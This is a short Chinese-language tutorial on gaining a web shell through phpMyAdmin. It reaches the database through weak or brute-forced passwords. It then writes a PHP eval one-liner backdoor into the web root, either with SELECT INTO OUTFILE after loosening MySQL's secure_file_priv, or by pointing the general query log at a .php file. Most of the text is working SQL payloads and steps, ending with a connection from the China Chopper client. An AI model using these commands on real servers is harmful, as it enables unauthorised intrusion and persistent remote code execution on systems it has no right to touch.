phpmyadmin getshell

在通过对目标进行信息收集探测后，当发现存有phpmyadmin目录时，进而通过弱口令或者暴力破解进入数据库之后，有多种方法进行getshell

注：大多数集成包里自带，如：phpstudy，wampserver，xampp等

实验环境：windows   phpstudy集成环境

into outfile

最常用的是一句话木马的写入

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php';

当然，前提是你得知道网站的绝对路径，方法也有很多，比如通过报错获取路径，通过phpinfo.php等等

但在新版的mysql中，这句话并没有运行成功

错误

mysql新特性secure_file_priv会对读写文件产生影响，该参数用来限制导入导出

可以查看该参数 

show global variables like '%secure%';

当secure_file_priv为NULL时，表示限制mysql不允许导入导出。所以爆出错误

要想使得该语句导出成功，则需要在mysql文件夹下修改my.ini 文件，

在[mysqld]内加入secure_file_priv ="" 即可

secure_file_priv

当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制

此时就可以执行导出命令

利用日志文件

mysql 5.0版本以上会创建日志文件，修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。

注：linux因为权限问题亲测没有成功

查看日志状态 

show variables  like  '%general%';

日志

当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件

那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成

进而getshell

SET GLOBAL general_log='on'

开启日志

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

设置日志的路径

对应就会生成xxx.php文件

xxx.php

将一句话木马写入xxx.php文件

SELECT '<?php eval($_POST["cmd"]);?>'

一句话木马 对应的日志文件

中国菜刀连接，getshell

getshell